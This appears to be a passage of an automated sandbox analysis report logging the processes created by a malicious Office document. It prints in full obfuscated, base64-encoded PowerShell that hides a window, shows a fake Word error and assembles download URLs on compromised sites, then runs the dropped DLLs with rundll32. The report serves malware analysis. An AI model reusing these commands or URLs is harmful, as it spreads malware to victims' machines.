Source: unknown	Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded SET ("5"+"FTsG") ( [tYPE]("{1}{3}{0}{4}{2}" -F 'Io.','sy','Ory','stem.','dIrect')) ; $qE3R9= [TyPe]("{1}{0}{5}{4}{2}{3}"-f'Y','S','PoiNtmAn','AGEr','tEm.nET.SeRVIce','s') ;$Ko3ac63=$T82H + [char](33) + $P6_S;$I70Z=('Y5'+'0E'); (Get-iTEm ("v"+"a"+"RIABle:5"+"FtSg") ).ValUe::"Cr`EAtE`dire`ctorY"($HOME + ((('e2W'+'K'+'ak')+('tksw'+'e'+'2W')+('An6ot'+'h')+('he'+'2W')) -cREPLACe ('e'+'2W'),[CHAR]92));$W90X=('D'+('63'+'T')); (VarIABle Qe3R9 -vALuEOnl )::"S`EC`UrIt`Y`protoCOL" = ('Tl'+('s1'+'2'));$E32N=('J'+('96'+'C'));$Ue7v6em = (('N'+'49')+'I');$B31C=('A8'+'1J');$Qfx10xa=$HOME+(('{0}Ka'+'ktksw{'+'0'+'}'+'An'+'6othh{0}')-F [chaR]92)+$Ue7v6em+'.d' + 'll';$Y03E=('B3'+'3R');$K1iuxxp='h' + 'tt' + 'p';$Ta1ysp4=('ns'+' '+('wu d'+'b ')+('n'+'d:')+('/'+'/shan')+'n'+('ar'+'e')+'d'+('.com/co'+'n'+'te'+'n')+'t'+('/lh'+'A')+('Le'+'S')+('/!n'+'s')+(' wu '+'db')+(' n'+'d:')+'//'+('jee'+'van')+('lic.com/w'+'p-'+'co'+'n'+'te')+('nt'+'/')+('r'+'8M/!'+'ns')+(' '+'wu '+'db nd')+(':/'+'/d')+'as'+('h'+'ud')+('ance'+'.co')+('m/'+'th')+'in'+('kp'+'h'+'p/d')+'g'+'s'+('7J'+'m9')+'/'+('!n'+'s w')+('u d'+'b')+(' n'+'d:/'+'/')+('l'+'eo')+('par'+'dc')+('ran'+'es')+('.co'+'m/'+'zynq')+'-'+'l'+('i'+'nu'+'x'+'-yaay')+'f/'+('w'+'/!n')+'s '+('wu '+'db'+' ')+'n'+'d'+':'+'/'+('/mmrinc'+'s.')+('co'+'m'+'/eternal-')+('d'+'uel')+('i'+'st-')+('9cu'+'qv/j')+('x'+'GQj/!'+'n')+('s'+' w')+('u d'+'b nd'+':/')+('/3'+'mu'+'sk')+'et'+('eer'+'sent.ne'+'t/')+('w'+'p-in'+'cludes/TU'+'gD/!n'+'s ')+'wu'+' '+('d'+'b ')			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
